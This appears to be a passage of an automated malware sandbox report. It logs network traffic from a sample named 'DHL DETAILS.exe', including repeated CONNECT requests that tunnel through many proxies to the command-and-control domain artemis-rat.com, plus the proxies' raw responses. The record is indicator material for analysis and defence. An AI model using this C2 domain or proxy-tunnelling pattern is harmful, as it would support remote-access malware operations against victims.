                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1481192.168.2.5544208.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.231597900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1482192.168.2.554491200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.243283987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1483192.168.2.554493200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.243880033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1484192.168.2.554494200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.245260000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1485192.168.2.554497200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.247127056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1486192.168.2.554422103.166.141.74200746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.291455984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1487192.168.2.554381197.242.146.10931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.291932106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224334002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630670071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1488192.168.2.554424185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.292246103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1489192.168.2.55390168.169.60.22083806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.295104980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1490192.168.2.554373103.109.59.20910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.296842098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1491192.168.2.554425139.129.202.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.328735113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.699953079 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1492192.168.2.55386985.62.218.25031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.344511032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.662645102 CET1254INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.28
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 952
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ah_test
                                                                                    Via: 1.1 ah_test (squid/3.5.28)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 31 39 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:19 GMT</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1493192.168.2.54989180.13.43.193806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.349889040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.536284924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.630044937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646318913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1494192.168.2.554453172.67.3.108806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.368542910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.523802996 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1495192.168.2.554447192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.369718075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1496192.168.2.55376794.70.195.14580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.376295090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.689667940 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1497192.168.2.554426122.51.123.219806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.377274990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.708197117 CET759INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 588
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1498192.168.2.55443145.195.149.7910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.386357069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1499192.168.2.5541698.213.128.680196352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.386940956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1500192.168.2.554209111.59.4.8890026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.392472982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.092283010 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
